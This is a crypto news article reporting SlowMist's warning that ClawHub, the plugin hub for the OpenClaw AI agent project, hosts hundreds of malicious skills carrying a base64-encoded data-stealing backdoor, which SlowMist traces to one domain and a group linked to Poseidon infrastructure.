🔥 BitDegree partnered with Ogvio - a free international money transfer service! Sign up now & grab Rewards! 🎁
Ogvio Horizontal Banner
Crypto News Exploits
ClawHub Flooded with Malicious Plugins, SlowMist Issues Warning

ClawHub Flooded with Malicious Plugins, SlowMist Issues Warning

Aaron S. Editor-In-Chief
Written by Aaron S.,
Editor-In-Chief

✓ Fact Checked

Last Updated: February 09, 2026

✓ Fact Checked

Key Takeaways

  • SlowMist reports that attackers upload unsafe skills to ClawHub, and users face risk the moment they install these add-ons;
  • MistEye flags 472 high-risk skills, and SlowMist states that the backdoor can gather sensitive data and support extortion;
  • SlowMist links most skills to one domain and one IP, and the firm sees signs of a coordinated group behind the attacks.

Stop overpaying - start transferring money with Ogvio. Sign up, invite friends & grab Rewards now! 🎁

ClawHub Flooded with Malicious Plugins, SlowMist Issues Warning

SlowMist has published new findings showing that ClawHub, the plugin hub used by the open-source artificial intelligence (AI) agent project OpenClaw, has become a frequent target for supply-chain attacks.

The firm said harmful add-ons have been uploaded to the platform and can reach users as soon as they install them.

According to the report released on February 9, attackers have been placing unsafe “skills” on ClawHub. SlowMist stated that the hub lacks robust review checks.

NEAR Protocol Explained: Beginner's Guide to NEAR (Animated)

Did you know?

Want to get smarter & wealthier with crypto?

Subscribe - We publish new crypto explainer videos every week!

NEAR Protocol Explained: Beginner's Guide to NEAR (Animated)

NEAR Protocol Explained: Beginner's Guide to NEAR (Animated) NEAR Protocol Explained: Beginner's Guide to NEAR (Animated)

MistEye, SlowMist’s threat-tracking system for Web3 environments, flagged 472 entries as high-risk items.

Once a device is infected, attackers often steal files and passwords. SlowMist stated that the backdoor, encoded in base64, can gather sensitive information and is sometimes used to pressure victims after the data is taken.

Most of the uploaded skills lead back to the same domain, socifiapp[.]com, registered in July 2025. SlowMist also links the activity to an IP address previously associated with infrastructure used by the Poseidon group.

Many of the fake skills use names related to crypto, finance, or automation. SlowMist noted that these topics can make users less cautious and more likely to quickly install the plugins.

The report concludes that this is not the work of one individual. The repeated use of the same domain, IP address, and techniques points to a coordinated effort by a group carrying out the same attack across multiple skills.

Recently, researchers warned that Clawdbot setups can expose chat logs and API keys if users fail to secure their servers properly. What did SlowMist and Jamieson O’Reilly say? Read the full story.

Aaron S. Editor-In-Chief
Aaron S. Editor-In-Chief
Having completed a Master’s degree in Economics, Politics, and Cultures of the East Asia region, Aaron has written scientific papers analyzing the differences between Western and Collective forms of capitalism in the post-World War II era.
With close to a decade of experience in the FinTech industry, Aaron understands all of the biggest issues and struggles that crypto enthusiasts face. He’s a passionate analyst who is concerned with data-driven and fact-based content, as well as that which speaks to both Web3 natives and industry newcomers.
Aaron is the go-to person for everything and anything related to digital currencies. With a huge passion for blockchain & Web3 education, Aaron strives to transform the space as we know it, and make it more approachable to complete beginners.
Aaron has been quoted by multiple established outlets, and is a published author himself. Even during his free time, he enjoys researching the market trends, and looking for the next supernova.
See Our Experts
Loading...

The Most Liked Crypto News Findings

Looking for more latest crypto news on related topic? We have gathered similar news articles for you to spare your time. Take a look!

Infini Exploit Wallet Reawakens to Scoop $13 Million in Ethereum

Exploits

Infini Exploit Wallet Reawakens to Scoop $13 Million in Ethereum

Xinbi Moves $17.9 Billion On-Chain Despite Bans, TRM Reports

Exploits

Xinbi Moves $17.9 Billion On-Chain Despite Bans, TRM Reports

Crypto Users Hit Hard by Rising Address and Signature Scams

Exploits

Crypto Users Hit Hard by Rising Address and Signature Scams

Latest Crypto News & Videos

Xinbi Moves $17.9 Billion On-Chain Despite Bans, TRM Reports

Exploits

Xinbi Moves $17.9 Billion On-Chain Despite Bans, TRM Reports

Fed’s ‘Skinny Master Accounts’ Plan Splits Crypto Firms and Banks

Regulation

Fed’s ‘Skinny Master Accounts’ Plan Splits Crypto Firms and Banks

Crypto Users Hit Hard by Rising Address and Signature Scams

Exploits

Crypto Users Hit Hard by Rising Address and Signature Scams

How to Avoid P2P Crypto Scams in Pakistan? (Animated Explainer) How to Avoid P2P Crypto Scams in Pakistan? (Animated Explainer)
VIDEO

How to Avoid P2P Crypto Scams in Pakistan? (Animated Explainer)

Coinbase VS Ogvio: Which is Better For Africa & Asia in 2026? Coinbase VS Ogvio: Which is Better For Africa & Asia in 2026?
VIDEO

Coinbase VS Ogvio: Which is Better For Africa & Asia in 2026?

How to Send Money Abroad? Most Affordable Way Revealed (2026) How to Send Money Abroad? Most Affordable Way Revealed (2026)
VIDEO

How to Send Money Abroad? Most Affordable Way Revealed (2026)

Trending Crypto News

BitMine Immersion Technologies Snaps Up 40,613 ETH in Market Drop

BitMine Immersion Technologies Snaps Up 40,613 ETH in Market Drop

Ripple Adds Securosys and Figment to Power Institutional Staking

Ripple Adds Securosys and Figment to Power Institutional Staking

French Magistrate Kidnapped in Crypto Ransom Plot

French Magistrate Kidnapped in Crypto Ransom Plot

Infini Exploit Wallet Reawakens to Scoop $13 Million in Ethereum

Infini Exploit Wallet Reawakens to Scoop $13 Million in Ethereum

Ogvio Square Banner
Coinbase Square
Ledger Square
Ogvio Square Banner
binance
×
Verified

ZERO FEES

For Ogvio Money Transfers
Rating
5.0
Get deal
×
BitDegree.org

BitDegree.org

Fact-checking Standards

To ensure the highest level of accuracy & most up-to-date information, BitDegree.org is regularly audited & fact-checked by following strict editorial guidelines & review methodology.
Carefully selected industry experts contribute their real-life experience & expertise to BitDegree's content. Our extensive Web3 Expert Network is compiled of professionals from leading companies, research organizations and academia.

All the content on BitDegree.org meets these criteria:

  • Only authoritative sources like academic associations or journals are used for research references while creating the content.
  • The real context behind every covered topic must always be revealed to the reader.
  • If there's a disagreement of interest behind a referenced study, the reader must always be informed.
Feel free to contact us if you believe that content is outdated, incomplete, or questionable.
×
Subscribe

Subscribe

On Youtube

Understand crypto with ease

New explainer videos every week!